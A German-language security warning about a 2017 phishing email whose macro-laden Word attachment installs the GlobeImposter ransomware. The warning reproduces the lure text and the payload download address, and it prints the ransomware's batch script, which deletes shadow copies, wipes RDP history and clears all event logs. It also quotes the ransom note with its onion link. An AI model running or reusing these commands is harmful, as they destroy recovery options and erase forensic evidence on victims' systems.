Message from KM_C018e von copier@Deine Domain bringt die Ransomware ‚GlobeImposter‘!
Am Donnerstag, den 14. Dezember 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in englischer Sprache versendet. Öffnen Sie nicht die Word-Datei und führen Sie das Makro nicht aus! Die Ransomware „GlobeImposter“ (Verschlüsselungs- und Epressungstrojaner) würde Ihren PC sonst verschlüsseln!
Betreff: Message from KM_C018e
Absender: copier@Deine Domain
Achtung: Es handelt sich um eine betrügerische E-Mail! Öffnen Sie nicht die Anlage!
Die E-Mail bringt eine Microsoft Word – Datei mit, die so aussieht:
C018e42090133236.doc
Microsoft Office
Document created using the application not related to Microsoft Office
For viewing/editing, perform the following stepts:Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.
Führen Sie das Makro nicht aus! Von der Adresse pragmaticinquiry.org/nBSvshHTD6 würde eine ausführbare Datei nachgeladen!
morogen8.exe
Es handelt sich um den Verschlüsselungs- und Erpressungstrojaner „GlobeImposter“ (Ransomware). Virustotal zeigt eine Erkennungsrate von 39/66.
Die Ransomware beginnt sofort damit, alle wichtigen Dateien in *.doc umzubenennen:
Daneben produziert „GlobeImposer“ eine Datei, die auf die Verschlüsselung hinweist:
Read___ME.html
Außerdem legt der Trojaner noch eine Batch-Datei an:
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default“ /va /f
reg delete „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers“ /f
reg add „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers“
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F „tokens=*“ %1 in (‚wevtutil.exe el‘) DO wevtutil.exe cl „%1“
Auf dem Desktop sind selbst die Links verschlüsselt:
Die „Read___ME.html“ zeigt folgenden Inhalt:
Your files are Encrypted!
For data recovery needs decryptor.
If you want to buy a decryptor click „Buy Decryptor“
Buy Decryptor
If not working, click again.
Free decryption as guarantee.
Before paying you can send us 1 file for free decryption.If you can not contact, follow these two steps:
1. Install the TOP Browser from this link: torproject.org
2. Open this link in the TOP browser: http://n224ezvhg4sgyamb.onion/sup.php